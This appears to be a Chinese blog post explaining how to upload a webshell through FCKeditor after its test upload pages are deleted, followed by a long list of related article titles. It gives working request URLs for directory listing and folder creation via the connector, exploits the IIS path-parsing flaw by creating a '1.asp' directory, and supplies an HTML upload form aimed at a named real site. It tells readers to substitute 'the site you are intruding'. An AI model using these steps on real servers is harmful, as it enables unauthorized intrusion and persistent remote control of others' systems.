当前位置: 首页 > news >正文

解决Fckeditor删除所有上传页面如何上传

 首先,你得确定下Fckeditor的版本。

 
/FCKeditor/editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?
 
/FCKeditor/editor/filemanager/browser/default/browser.html
 
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
 
/FCKeditor/editor/filemanager/upload/test.html
 
/FCKeditor/editor/filemanager/connectors/test.html
 
/FCKeditor/editor/filemanager/connectors/uploadtest.html

 
嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么 
 
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
 
/fckeditor/editor/filemanager/connectors/asp/connector.asp
 
/fckeditor/editor/filemanager/connectors/php/connector.php
 
 
如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例
 
 
1.查看Media目录下的文件:
 
 
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
 
 
 
红色Media可以更改为File或者image,相应的进入文件或者图片目录下
 
 
2.利用iis解析漏洞创建1.asp特殊目录
 
 
fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp
 
 
 
红色的是对应的Media目录,蓝色的是特殊目录名字
 
 
 
 3.构建表单,上传webshell到特殊目录
 
 
 
<form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp" method="post">
 
Upload a new file:<br>
 
<input type="file" name="NewFile" size="50"><br>
 
<input id="btnUpload" type="submit" value="Upload">
 
</form>
 
 
将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。 

 
最后的一些提示
 
 
上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。

相关文章:

  • shell突破web防火墙访问
  • serv-u最新通杀所有版本0day
  • Nginx简单防御CC攻击
  • Linux系统防火墙防止DOS和DDOS攻击
  • 思科路由器安全加固方案(南方电网预实施方案)
  • 安全服务反思:把渗透测试做成服务
  • JavaScript连接数据库
  • 史上最全的各个脚本的一句话木马
  • 入侵前的信息刺探
  • 各种网络环境渗透测试简述
  • 写给那些ASP.NET程序员:网站中的安全问题
  • LogParser的IIS网站分析技巧
  • SQL注入攻击-来自微软安全博客的建议
  • MySQL 备库设置编码语句
  • 批处理+Linux书籍+黑客编程+脚本攻防+逆向工程书籍+海量资源(pdf+chm电子书)
  • Brief introduction of how to 'Call, Apply and Bind'
  • Facebook AccountKit 接入的坑点
  • JavaScript创建对象的四种方式
  • javascript数组去重/查找/插入/删除
  • LeetCode18.四数之和 JavaScript
  • mysql外键的使用
  • 分布式事物理论与实践
  • 关于 Cirru Editor 存储格式
  • 简单数学运算程序(不定期更新)
  • 买一台 iPhone X,还是创建一家未来的独角兽?
  • 配置 PM2 实现代码自动发布
  • 前端每日实战:61# 视频演示如何用纯 CSS 创作一只咖啡壶
  • 使用阿里云发布分布式网站,开发时候应该注意什么?
  • 通过来模仿稀土掘金个人页面的布局来学习使用CoordinatorLayout
  • 小程序开发中的那些坑
  • 一些基于React、Vue、Node.js、MongoDB技术栈的实践项目
  • 原生js练习题---第五课
  • 看到一个关于网页设计的文章分享过来!大家看看!
  • Mac 上flink的安装与启动
  • 国内唯一,阿里云入选全球区块链云服务报告,领先AWS、Google ...
  • #LLM入门|Prompt#1.8_聊天机器人_Chatbot
  • $.proxy和$.extend
  • ()、[]、{}、(())、[[]]等各种括号的使用
  • (13)Hive调优——动态分区导致的小文件问题
  • (过滤器)Filter和(监听器)listener
  • (一)插入排序
  • (译) 理解 Elixir 中的宏 Macro, 第四部分:深入化
  • (转)德国人的记事本
  • (转)树状数组
  • * CIL library *(* CIL module *) : error LNK2005: _DllMain@12 already defined in mfcs120u.lib(dllmodu
  • ****** 二 ******、软设笔记【数据结构】-KMP算法、树、二叉树
  • .bat批处理(九):替换带有等号=的字符串的子串
  • .NET 中创建支持集合初始化器的类型
  • .Net环境下的缓存技术介绍
  • .Net下C#针对Excel开发控件汇总(ClosedXML,EPPlus,NPOI)
  • /boot 内存空间不够
  • [AIGC] Kong:一个强大的 API 网关和服务平台
  • [Angular] 笔记 16:模板驱动表单 - 选择框与选项
  • [BZOJ 1040] 骑士
  • [BZOJ3211]:花神游历各国(小清新线段树)